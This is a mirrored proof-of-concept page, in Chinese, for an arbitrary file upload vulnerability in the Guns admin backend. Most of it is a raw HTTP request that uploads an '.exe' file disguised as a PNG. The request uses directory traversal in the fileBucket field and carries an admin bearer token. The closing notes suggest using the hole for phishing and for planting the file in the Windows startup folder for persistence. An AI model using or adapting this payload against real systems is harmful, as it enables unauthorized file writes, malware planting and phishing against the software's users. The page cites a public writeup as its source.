mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-30 06:24:42 +00:00
48 lines
2.0 KiB
Markdown
48 lines
2.0 KiB
Markdown
# Guns后台任意文件上传漏洞
|
||
|
||
Guns后台任意文件上传漏洞
|
||
|
||
## poc
|
||
|
||
```javascript
|
||
POST /api/sysFileInfo/upload HTTP/1.1
|
||
Host: 192.168.91.130:9000
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
|
||
Accept: application/json, text/plain, */*
|
||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||
Accept-Encoding: gzip, deflate
|
||
Referer: http://192.168.91.1:9000/system/structure/user
|
||
Authorization: eyJhbGciOiJIUzUxMiJ9.eyJ1c2VySWQiOjEzMzk1NTA0Njc5Mzk2MzkyOTksImFjY291bnQiOiJhZG1pbiIsInV1aWQiOiI1NmQzZjczNy1hNjU1LTRjYzgtODRkNi0xNDdjYTE1M2Y5OGIiLCJyZW1lbWJlck1lIjpmYWxzZSwiZXhwaXJhdGlvbkRhdGUiOjE3MzUxMDM0MDM0ODgsImNhVG9rZW4iOm51bGwsIm90aGVycyI6bnVsbCwic3ViIjoiMTMzOTU1MDQ2NzkzOTYzOTI5OSIsImlhdCI6MTczNDQ5ODYwMywiZXhwIjoxNzM1MTAzNDAzfQ.Ur3bUwltSXWUtIT1OOR4MV4frJeRy_MDEkmYg99F5L2DOx6C4ha_y476dTWMy7gAJZsq5x_2C_VEkWxWv7uHXw
|
||
Content-Type: multipart/form-data; boundary=---------------------------4047569836919132683218702
|
||
Content-Length: 510
|
||
Origin: http://192.168.91.130:9000
|
||
Connection: close
|
||
|
||
-----------------------------4047569836919132683218702
|
||
Content-Disposition: form-data; name="file"; filename=".exe"
|
||
Content-Type: image/png
|
||
|
||
1111
|
||
-----------------------------4047569836919132683218702
|
||
Content-Disposition: form-data; name="secretFlag"
|
||
|
||
N
|
||
-----------------------------4047569836919132683218702
|
||
Content-Disposition: form-data; name="fileBucket"
|
||
|
||
../../../../../../../../../../../../../../../../../../看到请点击exe备份
|
||
-----------------------------4047569836919132683218702--
|
||
```
|
||
|
||
|
||
|
||
|
||
|
||
可以用在钓鱼,如果项目在c盘,可以放到启动项中,
|
||
这里可以看到是在哪个盘
|
||
|
||
|
||
|
||
## 漏洞来源
|
||
|
||
- https://xz.aliyun.com/t/16808?time__1311=Gui%3DGIfDODkD%2FD0lD2DUxQw860LQcrpD#toc-0 |